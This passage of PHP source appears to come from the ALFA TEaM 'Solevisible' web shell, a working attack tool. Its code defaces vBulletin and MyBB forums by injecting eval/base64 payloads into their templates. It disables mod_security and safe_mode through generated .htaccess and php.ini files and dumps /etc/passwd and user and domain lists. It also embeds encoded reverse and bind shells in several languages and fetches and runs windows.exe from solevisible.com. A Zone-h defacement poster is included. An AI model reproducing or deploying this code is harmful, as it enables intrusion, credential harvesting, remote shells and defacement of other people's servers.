4461<textarea name='index' rows='19' cols='103'><title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><br>
4462<input type='submit' value=' '></form></center></center>";
4463if($_POST['alfa8']=='>>'){
4464$s0levisible="Powered By Solevisible";
4465$dbu = $_POST['alfa2'];
4466$dbn = $_POST['alfa3'];
4467$dbp = $_POST['alfa4'];
4468$dbh = $_POST['alfa5'];
4469$index = $_POST['alfa6'];
4470$prefix = $_POST['alfa7'];
4471$index=str_replace("\'","'",$index);
4472$set_index = "{\${eval(base64_decode(\'";
4473$set_index .= __ZW5jb2Rlcg("echo \"$index\";");
4474$set_index .= "\'))}}{\${exit()}}";
4475if(!empty($dbh)&&!empty($dbu)&&!empty($dbn)&&!empty($index)){
4476$conn=@mysqli_connect($dbh,$dbu,$dbp,$dbn) or die(mysqli_error($conn));
4477$loli1 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='spacer_open'";
4478$loli2 = "UPDATE ".$prefix."template SET template='".$set_index."".$s0levisible."' WHERE title='FORUMHOME'";
4479$loli3 = "UPDATE ".$prefix."style SET css='".$set_index."".$s0levisible."', stylevars='', csscolors='', editorstyles=''";
4480@mysqli_query($conn,$loli1) or die (mysqli_error($conn));
4481@mysqli_query($conn,$loli2) or die (mysqli_error($conn));
4482@mysqli_query($conn,$loli3) or die (mysqli_error($conn));
4483__alert('VB index changed...!');
4484}
4485}
4486}
4487if(isset($_POST['alfa2']) && ($_POST['alfa2'] == 'mybb')) {
4488echo __pre();
4489
4490echo "<center><center><div class='txtfont_header'>| Mybb |</div>
4491<p><center>".getConfigHtml('mybb')."<form onSubmit=\"g('IndexChanger',null,'null','mybb',null,null,null,this.mybbdbh.value,this.mybbdbu.value,this.mybbdbn.value,this.mybbdbp.value,this.mybbindex.value); return false;\" method=POST action=''>
4492";
4493$table = array('td1' =>
4494 array('color' => 'FFFFFF', 'tdName' => 'Mysql Host', 'inputName' => 'mybbdbh', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
4495 'td2' =>
4496 array('color' => 'FFFFFF', 'tdName' => 'Db Name', 'inputName' => 'mybbdbn', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
4497 'td3' =>
4498 array('color' => 'FFFFFF', 'tdName' => 'Db User', 'inputName' => 'mybbdbu', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
4499 'td4' =>
4500 array('color' => 'FFFFFF', 'tdName' => 'Db Pass', 'inputName' => 'mybbdbp', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50')
4501);
4502create_table($table);
4503echo "<br><div class='txtfont'>| Your Index |</div><br>
4504<textarea name=mybbindex rows='19' cols='103'>
4505<title>Hacked By Sole Sad & Invisible</title><b>Hacked By Sole Sad & Invisible</b></textarea><p><input type='submit' value='' ></p></form></center></center>";
4506if(isset($_POST['alfa6'])){
4507$mybb_dbh = $_POST['alfa6'];
4508$mybb_dbu = $_POST['alfa7'];
4509$mybb_dbn = $_POST['alfa8'];
4510$mybb_dbp = $_POST['alfa9'];
4511$mybb_index = $_POST['alfa10'];
4512if(!empty($mybb_dbh)&&!empty($mybb_dbu)&&!empty($mybb_dbn)&&!empty($mybb_index)){
4513$conn=@mysqli_connect($mybb_dbh,$mybb_dbu,$mybb_dbp,$mybb_dbn) or die(mysqli_error($conn));
4514$prefix="mybb_";
4515$loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'";
4516$result =@mysqli_query($conn,$loli7) or die (mysqli_error($conn));
4517__alert('MyBB index changed...!');
4518}
4519}
4520}
4521echo "</div>";
4522alfafooter();
4523}
4524function alfaproc()
4525{
4526alfahead();
4527echo "<Div class=header><br><center>";
4528if(empty($_POST['ajax'])&&!empty($_POST['alfa1']))
4529$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
4530if($GLOBALS['sys']=="win"){
4531$process=array(
4532"Task List" =>"tasklist /V",
4533"System Info" =>"systeminfo",
4534"Active Connections" => "netstat -an",
4535"Running Services" => "net start",
4536"User Accounts" => "net user",
4537"Show Computers" => "net view",
4538"ARP Table" => "arp -a",
4539"IP Configuration" => "ipconfig /all"
4540);}else{
4541$process=array(
4542"Process status" => "ps aux",
4543"Syslog" =>"cat /etc/syslog.conf",
4544"Resolv" => "cat /etc/resolv.conf",
4545"Hosts" =>"cat /etc/hosts",
4546"Cpuinfo"=>"cat /proc/cpuinfo",
4547"Version"=>"cat /proc/version",
4548"Sbin"=>"ls -al /usr/sbin",
4549"Interrupts"=>"cat /proc/interrupts",
4550"lsattr"=>"lsattr -va",
4551"Uptime"=>"uptime",
4552"Fstab" =>"cat /etc/fstab"
4553);}
4554foreach($process as $n => $link){
4555echo '<a href="javascript:void(0);" onclick="g(\'proc\',null,\''.$link.'\')"> | '.$n.' | </a>';
4556}
4557echo "</center><br>";
4558if(!empty($_POST['alfa1'])){
4559echo "<pre class='ml1' style='margin-top:5px' >";
4560if($GLOBALS["glob_chdir_false"]&&!empty($_POST["c"])){$cmd = "cd '".addslashes($_POST["c"])."';";}
4561echo alfaEx($cmd.$_POST['alfa1'], true);
4562echo '</pre>';
4563}
4564echo "</div>";
4565alfafooter();
4566}
4567function alfasafe(){
4568alfahead();
4569echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>";
4570echo '<h3><a href=javascript:void(0) onclick="g(\'safe\',null,\'php.ini\',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,\'ini\')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,\'pl\')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,\'passwd\')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,\'users\')">| Read-Users | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,\'valiases\')">| Get-User | </a><a href=javascript:void(0) onclick="g(\'safe\',null,null,null,null,null,null,null,null,\'domains\')">| Get-Domains | </a></center></h3>';
4571if(!empty($_POST['alfa8']) && isset($_POST['alfa8']) == 'domains'){
4572if(!_alfa_file_exists("/etc/virtual/domainowners")){
4573echo __pre();
4574$solevisible9 = _alfa_file('/etc/named.conf');
4575if(is_array($solevisible9)){
4576foreach($solevisible9 as $solevisible13){
4577if(@eregi('zone',$solevisible13)){
4578preg_match_all('#zone "(.*)"#',$solevisible13,$solevisible14);
4579if(strlen(trim($solevisible14[1][0])) > 2){
4580echo $solevisible14[1][0].'<br>';
4581}}}
4582}
4583}else{
4584echo __pre();
4585$users = _alfa_file("/etc/virtual/domainowners");
4586if(is_array($users)){
4587foreach($users as $boz){
4588$dom = explode(":",$boz);
4589echo $dom[0]."\n";}}}}
4590if(!empty($_POST['alfa6']) && isset($_POST['alfa6']) == 'valiases'){
4591echo '
4592<form onsubmit="g(\'safe\',null,null,null,null,null,null,\'valiases\',this.site.value,null,\'>>\'); return false;" method="post" /><center><div class="txtfont">Url: </font><input type="text" placeholder="site.com" name="site" /> <input type="submit" value=" " name="go" /></form></center>';
4593if(isset($_POST['alfa9']) && $_POST['alfa9'] == '>>'){
4594if(!_alfa_file_exists("/etc/virtual/domainowners")){
4595$site = trim($_POST['alfa7']);
4596$rep = str_replace(array("https://","http://","www."),"",$site);
4597$user = "";
4598if(function_exists("posix_getpwuid") && function_exists("fileowner")){
4599 if($user = @posix_getpwuid(@fileowner("/etc/valiases/{$rep}"))){
4600 $user = $user['name'];
4601 }
4602}else{
4603 if(_alfa_can_runCommand(true,true)){
4604 $user = alfaEx("stat -c '%U' /etc/valiases/".$rep);
4605 }
4606}
4607if(!empty($user)&&$user!='root'){
4608echo __pre()."<center><table border='1'><tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">{$user}</font></b></td></tr><tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";
4609}else {echo __pre().'<center><b>No such file or directory Or Disable Functions is not NONE...</b></center>';}
4610}else{
4611$site = trim($_POST['alfa7']);
4612$rep = str_replace(array("https://","http://","www."),"",$site);
4613$users = _alfa_file("/etc/virtual/domainowners");
4614foreach($users as $boz){
4615$ex = explode(":",$boz);
4616if($ex[0] == $rep){
4617echo __pre()."<center><table border='1'>
4618<tr><td><b><font color=\"#FFFFFF\">User: </b></font></td><td><b><font color=\"#FF0000\">".trim($ex[1])."</font></b></td></tr>
4619<tr><td><b><font color=\"#FFFFFF\">site: </b></font></td><td><b><font color=\"#FF0000\">{$rep}</font></b></td></tr></table></center>";break;}}}}}
4620if(!empty($_POST['alfa5']) && isset($_POST['alfa5'])){
4621if(!_alfa_file_exists("/etc/virtual/domainowners")){
4622echo __pre();
4623$i = 0;
4624while ($i < 60000) {
4625$line = @posix_getpwuid($i);
4626if (!empty($line)) {
4627while (list ($key, $vl) = each($line)){
4628echo $vl."\n";
4629break;}}$i++;}
4630}else{echo __pre();
4631$users = _alfa_file("/etc/virtual/domainowners");
4632foreach($users as $boz){
4633$user = explode(":",$boz);
4634echo trim($user[1]).'<br>';}}}
4635if(!empty($_POST['alfa4']) && isset($_POST['alfa4'])){
4636echo __pre();
4637if(_alfa_can_runCommand(true,true)){echo __read_file("/etc/passwd");}elseif(function_exists("posix_getpwuid")){
4638for($uid=0;$uid<60000;$uid++){
4639$ara = @posix_getpwuid($uid);
4640if(!empty($ara)){
4641while(list ($key, $val) = each($ara)){
4642echo "$val:";
4643}echo "\n";}}
4644}else{__alert('failed...');}}
4645if(!empty($_POST['alfa2']) && isset($_POST['alfa2'])){
4646@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<IfModule mod_security.c>\nSec------Engine Off\nSec------ScanPOST Off\n</IfModule>");
4647echo '<center><b><big>htaccess for Apache created...!</center></b></big>';
4648}
4649if(!empty($_POST['alfa1'])&& isset($_POST['alfa1'])){
4650@__write_file($GLOBALS['cwd']."php.ini","safe_mode=OFF\ndisable_functions=ByPassed By Sole Sad & Invisible(ALFA TEaM)");
4651echo '<center><b><big> php.ini created...!</center></b></big>';
4652}
4653if(!empty($_POST['alfa3']) && isset($_POST['alfa3'])){
4654@__write_file($GLOBALS['cwd'].".htaccess","#Generated By Sole Sad and Invisible\n<Files *.php>\nForceType application/x-httpd-php4\n</Files>\n<IfModule mod_security.c>\nSecFilterEngine Off\nSecFilterScanPOST Off\n</IfModule>");
4655echo '<center><b><big>htaccess for Litespeed created...!</center></b></big>';
4656}
4657echo "<br></div>";
4658alfafooter();
4659}
4660function __get_resource($content){
4661return @gzinflate(__ZGVjb2Rlcg($content));
4662}
4663function __write_file($file, $content){
4664if($fh = @fopen($file, "wb")){
4665if(fwrite($fh, $content)!==false) return true;
4666}
4667return false;
4668}
4669function bcinit($evalType, $evalCode, $evalOptions, $evalArguments){
4670$res = "<font color='green'>[ Success...! ]</font>";
4671$err = "<font color='red'>[ Failed...! ]</font>";
4672if($evalOptions!="") $evalOptions = $evalOptions." ";
4673if($evalArguments!="") $evalArguments = " ".$evalArguments;
4674if($evalType=="c"){
4675$tmpdir = ALFA_TEMPDIR;
4676chdir($tmpdir);
4677if(is_writable($tmpdir)){
4678$uniq = substr(md5(time()),0,8);
4679$filename = $evalType.$uniq.".c";
4680$path = $filename;
4681if(__write_file($path, $evalCode)){
4682$ext = ($GLOBALS['sys']=='win')? ".exe":".out";
4683$pathres = $filename.$ext;
4684$evalOptions = "-o ".$pathres." ".$evalOptions;
4685$cmd = "gcc ".$evalOptions.$path;
4686alfaEx($cmd);
4687if(is_file($pathres)){
4688if(chmod($pathres, 0755)){
4689$cmd = $pathres.$evalArguments;
4690alfaEx($cmd);
4691}else{$res = $err;}
4692unlink($pathres);
4693}else{$res = $err;}
4694unlink($path);
4695}else{$res = $err;}
4696}
4697return $res;
4698}elseif($evalType=="java"){
4699$tmpdir = ALFA_TEMPDIR;
4700chdir($tmpdir);
4701if(is_writable($tmpdir)){
4702if(preg_match("/class\ ([^{]+){/i",$evalCode, $r)){
4703$classname = trim($r[1]);
4704$filename = $classname;
4705}else{
4706$uniq = substr(md5(time()),0,8);
4707$filename = $evalType.$uniq;
4708$evalCode = "class ".$filename." { ".$evalCode . " } ";
4709}
4710$path = $filename.".java";
4711if(__write_file($path, $evalCode)){
4712$cmd = "javac ".$evalOptions.$path;
4713alfaEx($cmd);
4714$pathres = $filename.".class";
4715if(is_file($pathres)){
4716if(chmod($pathres, 0755)){
4717$cmd = "java ".$filename.$evalArguments;
4718alfaEx($cmd);
4719}else{$res = $err;}
4720unlink($pathres);
4721}else{$res = $err;}
4722unlink($path);
4723}else{$res = $err;}
4724}
4725return $res;
4726}
4727return false;
4728}
4729function alfaconnect(){
4730alfahead();
4731$php="7VZta9swEP5e6H9QjaE2S5uXfhg0pDBYPw7KVtiHtjOOLNcitqVJ8pKxpb99d36L4zid17WwQV1wrbvTo0e6Oz1hSgnlKSaFMjy9d0bu9PBAM+MZnjAv5gk3hU3MPZ7ImFNuvDDOdOSg1Ta+umdGkxlhKxmLgDkWsQaktOchFL3js7O3OFj6MEizOMYBaw50BAMLUIAJub78+GG2Mkwl06tP49nxrX31+f3F8bR0g206nPN0CJNOuIXTE5z9QN7FoU+umZ8QHbE4Jg/k8AD9PCQOFVlqnIqyS2ZAyyU/Dg8IPLYEgNI3LU05I6saGRzBogFa1oTFmu1BnXSi6pvRXRO5No/vtpfw6SJfomAdZik1XKQeW3FttHMsaWpiLxRqcew2FuIBTN748vSgBzEK74yc4IYBxzjjtru0j5p2KTRfeVANmgeO2wFQUkTe1dlsGGHatVGQC08LuoCa0kx9Y8qxDJXnw+HoNP87t8gp0IeaYUqlovgP8yoiFURZkyKDw9YDclYztenOQj6lTGJcczcQYkQslsBAZ3MYOTKSXpb6CXPcARkBpptv0lrydLMPfMKl4oY5NgV2CdCFtNElHskpsS6sahF8lhGPGZ4oOQKk0Ici2UKqiyLE1ANic3J97orde4lvaORYQxrcEufmy62+e+MOOfYWnpVS7g5ujh1gGYB7U1VtdK69gCsHIgGCRtV3R7QtAGt7r62oTRsYxZPmEduyPEysFov8/En2RnzNIMIlc8jgooWP6AUNHxr7coWTkIi1k4TWxGbGRHNv60ZWaSw0a+WgMtalU2xxbzU059oB1ryvlP/dGZHZRflpSS4ZJM5SFtTZuMOxRMek27G1gFTY5EpQT0iWAstogKtiUXDZjMSUHEGmFdMiUxTYSqyY7d7Hp9Fe8xi6B0UAweCygp7oFTnuHTnpFUlbQWVPGZXt9lJ+QzIRYhaxyIrvgpXbXVO28uss5Tms9lBSbHdCzTFmFO4U5UPkEl8MXqheXS3MU6+xgvL3dCvHmwDggyKO6q42rOqtyorN21HrxwjU2+vDog5+nAp9EovJn7CY/D2Ljl7XXb3eeQEUp73PM97r2S6gvFcrb61p6+YPiEo9Ufa31TNEOSsaPSrvfZbia0v/nknb9LNr207uXrWtib9P2+AHa1910z3UrYeQ6VchexEh008SMv0kIdMvLmS65+Wt/ych0/+EkP2ORV8he2nN+gU=";
4732$python="pVRtT9swEP6cSv0PxptWR80M7YY0wYJUQZjQBlRtp30AVqXOpYmWOpHtQPnCb5/tJG1AHUKaqra+V99z95zf7e2XUuwvUr4P/B4VjyrJebeTropcKCTAk+WiEDkDKb1cevJRf3P2B5Sn0hV0O4WPcbeT2N8IYiQTyDLC3KNuxzFx/jaejvMCOGGe9fFnotTZVZSX6pnTxTgwahBilzrlL7WuvkmAKgVHRk2rlFRAGBG336h0upZqVSjiUuAsj4D0ShV//NLTeSoIIVNpzmsMaYxySXm4gj0fc4WNzol9RuM0A54Tc7ujPXRjFKwIhrVt3CyYXPprBWJ1PJ4O/N778a+zk95xbdWqY9tymaCPKfr6AfelEiR2+xidtIXhVjIXQSbBFvCQ6NuR6aAVHSUeq4MjdGkC2D0ZHAw/uzQCCxFbiNgW68CaQaFq/yKUstI2uR2DWWMjwj05qDXOwhdAJYSCJQSz6BaRm9+38q7vYk94cRYupXG4+HZ1PQlOR9PAreN0qkWTo+5lEaqEpjJKBVnQpcjLggxcd+NkmsmSF9bGqEcJPCL/mmDj18Ki8xl+WVYKt11JqVDII4tUnw3WOruRKkebB9XkOg+11HCkqeBoSz58y3FfF78ExR4Mz/CJ3omlr5lBQ7G810tV9XXp+v7Q7oe/vBncdTuQtSyf2hYn0YehddGVwDpVuhtm6VKuSKFP0q+2kVZ/pJZG5/OLq2BWryqdXp9+n09nk2B0aWI0TGUsebEJmF7/mBuvdsx8EvycBqOzs4lnLn1ZvaSawREh+IDaD/YKOwBJs1TvAieHRjLM1Csfur7uAjPEsyvT4qB5R6jMAAqLbTu8navXUIDgJzTK4hDNIFyhqZkvetIT2M2JLSFeC8ebp2F3ls3D8KwZdmAGJtLEzTkHpghJ6mbsxnn4Bpzy/3C+Fv5GnNL9Cw==";
4733$perl="lZLRjpNAFIav26TvMOJsC8kYWr1bpJFQ3DRrS8OwGmOVsPSsTKQDgVm3m+722Z0BVifGGL0755/Dd+Abnj+zb5vavmbcBv4dVVAXo+FtA2gZnp/TMvsGwhkNcdm4+EuoqiZ3DThUZS1QHEQr9yCg3jsbOnMnW7z5sNjOJ05/LkOnJTc5esEM+TS7MRXqtLfvZMysY4s788MV3QT+GbIvDedRLhHuVxBVXYry+p6nezAnIqsmliQ07SuZlIw3b5PlOojJmIb+ZULjKPBWBAvr4WHHwLS6bW+86OK9686s42g4wJWLVf9p+lmeDhoQilZWCkfDd4kCSSANkyi4ooG3WERkpkAD+RE7OaTG092uThg3cUWWazWSeOuPlrZ1ULBGAJfjr/Q0zTKQm3xCrW65JPrEOCGvuElRDOke0RyKAp223CDTdqisgCMaL5ZrYrwe+4bzFIRXMTHmehJEUZ/I5+AAGZJqtfVZUTZg+pbTFfRnoehaI8laJ6lWB2QCTWUlLweK5pfYl38Si/O+nXUtcxkHkaSilNpyXQpO3d+cYqafZyXnkKn7wamet/boP9gze3vzMTUs5ynp9elR709FfxP4f946W3BU+kz5Jz3+AA==";
4734$ruby="tVb7b9M6FP7Z+SuMN0hzVxLGQ+h2N6vGU0ggqjG4QmQXtc5pYy11gu3QoW387fiVrqXt1ivd66p1es7n8/T52p07SSNFMmI8Af4di2b0I9jBhVK17CXJhKmiGcW0miajR08fn7nPQMC3hgnAoazoGajwWlAPVcGHUwiDIIcxlg09kwESoBrB8fHHZ5+/Dt4enbx6f/wuzqsZp0MJ8XSoaNEJp3LG+KV5TxmfzMKor0QDvfGwlBAAz51FAcPSOOlIJSJtOdV7gNgYv2IlxHDOpJJ9r9TagY8n5jCz0rg1EKvqqw7NGDbHbaRYFcCxSEU8kc2ok2RJ0iVZRiJsYT4N4aLRh46OX3+KS+ATVaTpfoD1MqIvD07Tn8k/Xx7c//P0Yr/75Go36dfpG65gAqLjEVFPB6vsGZmePB98APEdhI2TkG4dWQ1NZTykFGoHpHEtGFeY2DZgWUBZ4h6mFedAFeQZJxY3ggnj9sksHSivlO8FXljjlJoqsCUhnAPF0voZdwic15VQ+OTl8bv0XIGYHgw+7Kdhtjv4+0V2GB54vRYe2DskC3yf4eyv7N7dHGeHdnvodtIdm1c09wamsYuu2/TmPSYxifbIIVlCzQrdaVzq2CeglhMySwyZBAxCVOKZqEzypWlGziAT/d1kBe+rU8a0qKZ1mhKyAvEwY4fmOP4jYWshZpVp6e+ORiasG4aRM7zxRHt1cz0/VFXiR79TRhvRzse8QLcgXzChvWvLNwHNZd6k264jCw31ZcpmvRvLtC5pV6etE7oN/p+mBRtNvXkf11UNvFN2iSDRxSWrLlvzrDJsk+8RPZd7K76ugm3D/l22+L19FiBpc33vNfnN6QW4bMR1BjKmZbWQkUw5K4PWluvhErE9tAS5gdi0o1VqO9DSIrXf9k81x5oC+oAc4TrGsz8ejvF2Loory3pIbsFxyBEcQkvUhhAaa760jIaMu/+byFCb2Tzo1QullS1hSUdYWoJuISkbP1rDTMjLF6nIytBm4kHtoTU0g9rDi4zihUvk4US2d3bdmLCty29MsDmKdpBX3S5r/o1z8Mh10ym3nM4lp353m/8zsHbgkJ82E6WbM/1kJwz58XKTZ8FG8gs=";
4735$node="nVHLasMwEDwrkH8QvliCoEDTW8ih9BPSW/pAtdeRQJZcSXYKIfn2yrKd5tGWYh+Ed2d2NDtquMWu4juNV9jCRy0tkDQTUuVvlTUZOJdSFgnL6aQJZA3+nBrKlPaQ8xZ4eY52nRMhM9oZBRdXda1I6VUEKBUo6fxd6rkTaUBkQXo3rFLcF8aWrOQ+E2T+ugssSen3XFbmDD4hPSlyu20CMCi0ZafZ/jEFeuvFarWg++kEtXwRyGEvlgXzHtZgG7CkqHXmpdHERR5ybGelB5Ic8YMqOH5qV19HD8dnnbT74P7rtgqiMUcSjZ7jTjDnc6mZBVeXQOg1ZGrPws1Jzj1PZoMTTNqa7gcnsVoebpXB2pHjf40Npm+mUXcKpqTzoGPKm7uXtnmYTkA5wNfZ35+ydxfZPxqtoYu9V5nF19wsotx/HgH9lj76IXY0Mm80Mmg0LuHDFw==";
4736$c="tVJtb9owEP7cSv0PHp1ap/WAsO0TTaWoZBLaChHJNE0bilLHNKcZG8Vmgk7rb98lBArZi/alUqzcPff47nzPnYLicpkJcmVsBrqdX58cn+5hBaj738BMwl0TXJuOXS+E+QNuNP8mbCOghAU8HVCNwFIBVqhAUJbMU1C0NNLinjOepwW5QPP7l6nz4+T4qIwYxpn23D662PCSI4IV0ywrElAEShxmtLzveb3q1hG0Dahkls5Brj3/XTIcBXH/KbDQhfVyq5WhqdVAq4Lu1HH2OGX+tql+FVXS4cgfDCaJP/q84Rlv83JaF2DR+OZ9EsWTwL9l3ZojbEnSC0sNxj8kJaeiJpPgYxSUGdmZZgYehJ5RvW1hRl8YR6zA0jrRHagMU9DGBMiFcwasu3JrmsThCoXEtxufeynnoqrefeoJU3HWeiS+nKUkFumcRLmQkjx+VS3We7MlZstFD4mHnnvg9eqUayw7py2xKkdL4mBy662sKOb9MHK985fhp8H1eb+OIoSm4KSDj+qYnLyCVt2t1EZQXjk/8QhpBNlp+/pZtC23tLI2zN60nveDKPQWYjh1iWPdMi7dy31kl/2fGzEMw8k4HifxTbgTmXKtlOD2r8rWe9GIOY5z1T1Yj0pT87+amobnHnjPoanZaorfLw==";
4737$java="lVRNb9swDD2nQP+D4JM9BG6T04bCwz6ww4ABHZbeuhwUhbG12rIg0XGCNPvtoz7sumsvPdiWyCfy8ZGybHRrkP3he57LNn93c3khJyYF6G2XF7rb1FIwUXNrGa93/A54c7q8mGkj9xyBWeRIgJ1UvI4wjQwOCGpr2V1lgG8dfjzwXekOV0j2hkl7M3Xddvjkazv0DMgdOGhMn5+dvziQnbCSNpe2oMh+ScbCRTqHUJ9u92CM3MIk7r6VW2Y6lWae5wzNMSxmmyPC/ZptWMEU9Mxv3y8+LNc3wS8VMkFOyuPKTDdZdPSVrCEVH4vrjMVYM2KR90YipJv59VwMUG/f1Z2t0tH0asyz/4S34Ciq9NtBgEbZKgbZCXJSUZEWXDzcGS6Awnmwe4XqY72xY77shkuVkn5SlVQoN6UNIrjK3Dj43MHPRLMlXsnVRqorWyXeJXfp6mgRmrwE/GlaDQaPadLaXPEGkizH9kfbg/nKLRHKpdrC4XaXJr1USebkOcWo9EkC35itd9a/7DONHHMzx1YV1DX7+1uFzJPe9C75F9rbKOGqFQ+ArIp9C9voG7tL1F29eQ2qxKooFrH9M38NCppThBJMrrmxQBuPvr9eD/1YgaFZiqnskGpiTF2gAe242JwL17Gh0aGXUFtg/5NZvpVMEE1qwnrXYj1JPBFB6jmb8Dq/LgV7fGSv85newFK6siun/sQ8jvGzy1m2I3ZqH8HkH27HYKJxEuB+J3TwV6dQNuCOxyVNExxApDQ4WfxPkFo0tYtYMOmsX1CbOyJDAodePqFL90fRLxmO8EVOV8e49unluHyS0b/ecDPpOf8D";
4738echo "<div class=header><center><br><div class='txtfont_header'>| Back Connect |</div><br><br>";
4739echo "<form onSubmit=\"g('connect',null,this.selectCb.value,this.server.value,this.port.value,this.cbmethod.value);return false;\">
4740<div class=\"txtfont\">Mehtod:</div> <select name='cbmethod' onChange='ctlbc(this);' style='width:120px;'><option value='back'>Reverse Shell</option><option value='bind'>Bind Port</option></select> <div class=\"txtfont\">Use:</div> <select name='selectCb'>";
4741$cbArr = array("php"=>"Php","perl"=>"Perl","python"=>"Python","ruby"=>"Ruby","c"=>"C","java"=>"Java","node"=>"NodeJs","bcwin"=>"Windows");
4742foreach($cbArr as $key=>$val){echo("<option value='{$key}' ".($GLOBALS['sys']=='win'?'selected':'').">{$val}</option>");}
4743echo "</select> <div id='bcipAction' style='display:inline-block;'><div class=\"txtfont\">IP:</div> <input type='text' style='text-align:center;' name='server' value='". $_SERVER['REMOTE_ADDR'] ."'></div> <div class=\"txtfont\">Port: </div> <input type='text' size='5' style='text-align:center;' name='port' value='2012'> <input type='submit' value=' '></form><p><div id='bcStatus'><small>Run ` <font color='red'>nc -l -v -p port</font> ` on your computer and press ` <font color='red'>>></font> ` button</small></div></p></center></b></font><br>";
4744if(isset($_POST['alfa1'])&&!empty($_POST['alfa1'])){
4745$lang = $_POST['alfa1'];
4746$ip = $_POST['alfa2'];
4747$port = $_POST['alfa3'];
4748$arg = ($_POST['alfa4']=='bind'?$port:$port.' '.$ip);
4749$tmpdir = ALFA_TEMPDIR;
4750$name = $tmpdir.'/'.$lang.uniqid().rand(1,99999);
4751$allow = array('perl','ruby','python','node');
4752eval('$lan=$'.$lang.';');
4753if(in_array($lang,$allow)){
4754if(__write_file($name,__get_resource($lan))){
4755if(_alfa_can_runCommand(true,true)){
4756$os = ($GLOBALS['sys']!='win')?'1>/dev/null 2>&1 &':'';
4757$out = alfaEx("$lang $name $arg $os");
4758if($out==''){$out="<font color='green'><center>[ Finished...! ]</center></font>";}
4759echo("<pre class='ml1' style='margin-top:5px'>{$out}</pre>");
4760}
4761}else{
4762echo("<pre class=ml1 style='margin-top:5px'><font color='red'><center>[ Failed...! ]</center></font></pre>");
4763}
4764}
4765if($lang=='java'||$lang=='c'){
4766$code = __get_resource($lan);
4767$out = nl2br(bcinit($lang, $code,'',''));
4768echo("<pre class=ml1 style='margin-top:5px'><center>{$out}</center></pre>");
4769}
4770if($lang=='bcwin'){
4771$alfa = new AlfaCURL();
4772$s = $alfa->Send('http://solevisible.com/bc/windows.exe');
4773$tmpdir = ALFA_TEMPDIR;
4774$f = @fopen($tmpdir.'/bcwin.exe','w+');
4775@fwrite($f, $s);
4776@fclose($f);
4777$out = alfaEx($tmpdir."/bcwin.exe ".$_POST['alfa2']." ".$_POST['alfa3']);
4778}
4779if($lang=='php'){
4780echo "<pre class=ml1 style='margin-top:5px'>";
4781$code = __get_resource($lan);
4782if($code!==false){
4783$code = "\$target = \"".$arg."\";\n".$code;
4784eval($code);
4785echo("<center><font color='green'>[ Finished...! ]</font></center>");
4786}
4787echo "</pre>";
4788}
4789}
4790echo "</div>";
4791alfafooter();
4792}
4793function alfazoneh(){
4794alfahead();
4795echo '<div class=header>';
4796if(!function_exists('curl_version')){
4797echo "<pre class=ml1 style='margin-top:5px'><center><font color=red><b><big><big>PHP CURL NOT EXIST ~ ZONE H MASS POSTER DOES NOT WORK</b></font></big></big></center></pre>";
4798}
4799$hackmode = array('known vulnerability (i.e. unpatched system)','undisclosed (new) vulnerability','configuration / admin. mistake','brute force attack','social engineering','Web Server intrusion','Web Server external module intrusion','Mail Server intrusion','FTP Server intrusion','SSH Server intrusion','Telnet Server intrusion','RPC Server intrusion','Shares misconfiguration','Other Server intrusion','SQL Injection','URL Poisoning','File Inclusion','Other Web Application bug','Remote administrative panel access bruteforcing','Remote administrative panel access password guessing','Remote administrative panel access social engineering','Attack against administrator(password stealing/sniffing)','Access credentials through Man In the Middle attack','Remote service password guessing','Remote service password bruteforce','Rerouting after attacking the Firewall','Rerouting after attacking the Router','DNS attack through social engineering','DNS attack through cache poisoning','Not available','Cross-Site Scripting');
4800$reason = array('Heh...just for fun!','Revenge against that website','Political reasons','As a challenge','I just want to be the best defacer','Patriotism','Not available');
4801echo '
4802<center><br><div class="txtfont_header">| Zone-h Mass Poster |</div><center><br>
4803<form action="" method="post" onsubmit="g(\'zoneh\',null,this.defacer.value,this.hackmode.value,this.reason.value,this.domain.value,\'>>\'); return false;">
4804<input type="text" name="defacer" size="67" id="text" placeholder="ALFA TEaM 2012" />
4805<br>
4806<select id="text" name="hackmode" style="width:400px;">';
4807$x=1;
4808foreach($hackmode as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
4809echo '</select><br><select id="text" name="reason" style="width:200px;">';
4810$x=1;
4811foreach($reason as $mode){echo('<option style="background-color: rgb(F, F, F);" value="'.$x.'">'.$mode.'</option>');$x++;}
4812echo '</select><br>
4813<textarea name="domain" cols="90" rows="20" placeholder="Domains..."></textarea><br>
4814<p><input type="submit" value=" " name="go" /></p>
4815</form></center>';
4816if($_POST['alfa5'] && $_POST['alfa5'] == '>>'){
4817ob_start();
4818$hacker = $_POST['alfa1'];
4819$method = $_POST['alfa2'];
4820$neden = $_POST['alfa3'];
4821$site = $_POST['alfa4'];
4822if(empty($hacker)){
4823die (__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST FILL THE ATTACKER NAME [+]</font></b></center>");
4824}elseif($method == "------------------------------------SELECT-------------------------------------"){
4825die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE METHOD [+]</b></font></center>");
4826}elseif($neden == "------------------------------------SELECT-------------------------------------"){
4827die(__pre()."<center><b><font color =\"#FF0000\">[+] YOU MUST SELECT THE REASON [+]</b></font></center>");
4828}elseif(empty($site)){
